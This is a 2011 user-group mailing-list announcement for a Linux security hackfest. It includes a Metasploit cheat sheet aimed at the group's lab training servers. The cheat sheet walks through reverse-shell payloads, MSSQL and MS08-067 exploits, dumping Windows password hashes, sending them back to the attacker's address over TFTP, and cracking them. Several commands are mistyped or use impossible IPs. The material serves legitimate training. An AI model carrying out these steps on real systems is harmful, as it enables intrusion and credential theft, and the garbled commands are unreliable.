PLUG Security Team @ Gangplankhq.com Saturday 1/29/2011, 12:00 - 15:00 Steven Kaplan's Cloud Target && Rapid7 Exposed

Lisa Kachold lisakachold at obnosis.com
Fri Jan 28 21:20:25 MST 2011


*CLOUD Targets/Rapid7 <http://www.rapid7.com/> Scanner Presented*

Steven Kaplan, MSC,  BSEE, CISSP, CISA,  (Senior Cyber Security Analyst,
DOE  Palo Verde Nuclear Facility) will be presenting *a full blown
(licensed) version of Rapid 7*, while letting *us bust his cloud*.

Mr. Kaplan has extensive experience in all areas of computer and network
security, from instructor to practitioner. His combined problem solving,
insights, innovations, programming and integration techniques have saved
companies (in some cases) millions of dollars in fines, avoided and achieved
innovative process optimizations – gains not strictly limited to computer
security.   Steven holds relevant industry CISA CISSP and Ethical Hacker
certifications.  Steve's scope includes process automation, especially
related to collecting network security vulnerabilities, user ID
revalidation, within and without  HIPAA,  PCI and SOX compliance.

Activities over the last 20 years cover both Federal Government (NSA)
INFOSEC experience and private sector work from National and International
industries. Technological experience includes evaluation of Role Based
Access Control (RBAC) systems, Java software review (for vulnerabilities),
ethical hacking (EH) as well as design, evaluation, certification and
accreditation (C&A) of security architectures and infrastructures.
Evaluating varied systems and diverse integrated networks, including
service-oriented architecture (SOA) for security vulnerabilities within
legislative requirements for compliance keeps Mr. Kaplan from straight
command line reverse engineering, perhaps his first love?  Audit experience
includes review for compliance to Sarbanes-Oxley and HIPAA regulations, and
the development of specialized software tools and scripts to expedite
compliance.

During the day, I will be building Persistent BT4R2 USB pendrive keys for
your software and network pentesting pleasure (bring 3GB or greater flash
drive) as we move through Steve's extensive presentation content.  End
result =  persistent Ubuntu BacktrackR42 !   I will be using my own ISO, so
optionally bring your own MD5 checksum  to verify integrity.

This will be a mixed format: Presentation/Lab (with full duplex audience
communications so that the community provides content expansion and more).

*Scott Becerra's  Layer 7 Web Flag Server* will also be on hand (if you
didn't get to pwn it last time), and will be available until Scott moves
south to work for the Army, hopefully at least until Mid February.  We plan
another Hamachi Hackfest to so we can enjoy Scott's company again ater he
moves south.

*
*
*Show up Saturday with your 3GB Flashdrive/Notebook and you might just need
this CheatSheet to poke the PLUG Pentesting Exploit Training Servers/Cloud:*

* HowTo's for basic Metasploit from Backtrack4R2:*

0) Quick Windows MultiHandler Reverse Shell

startx
/etc/init.d/./wicd start
{check your wireless or wired connection is working}
mfspayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444
>/root/payload.exe
optimize /root/putty.exe (for Windows target)
msfconsole
mfs> use exploit/multihander
mfs> set PAYLOAD windows/meterpreter/reverse_tcp
mfs> show options
mfs> set RHOST (local host ip)
mfs> shell go
mfsconsole > migrate <process #>
example  msfconsole > migrate 256
mfs> show explore
mfs> use name (from show explore)
mfs> set PAYLOAD
mfs> set RHOST
mfs> set LHOST

1) Nmap Mssql 2000
nmap -sT -0 10.10.10.254
nmap -sV 10.10.10.254
mfsconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc,exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
mfsconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
mfsconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./mfsconsole
<another shell>
./nessus
 Start a scan and Generate a Report
mfs> help
mfs> db_create /root/database/foobar.db
mfs> db_import
      Cross reference from report showing exploit port open and probable
reported from Nessus
Save output of the Nessus report to /root/nessus.nbe
mfs> db_import_nessus_nbe /root/nessus.nbe
mfs> db_autopwn -p -e
Viola!

*
**DISCLAIMER:  The use of Backtrack4R2 is advocated in pentest laboratories
only and for fully qualified professionals in production systems only after
written Corporate approval.  We do not advocate "cracking" and prefer the
definition hacker <http://hacker.> in it's original term meaning those who
reverse engineer and creatively find alternate uses for common IT systems.
With group educational focus,  PLUG Hackfests do not advocate "learning to
hack"; instead hacking to learn.*

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com
the Second and Third Saturdays Noon - 3PM
Attend long enough and we morph into a team.
-- 

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com


















-- 

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com
*Catch My MetaSploit & IP CAM Surveillence
Presentations @ ABLEConf.com in April!*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110128/af151ed4/attachment.html>


More information about the PLUG-discuss mailing list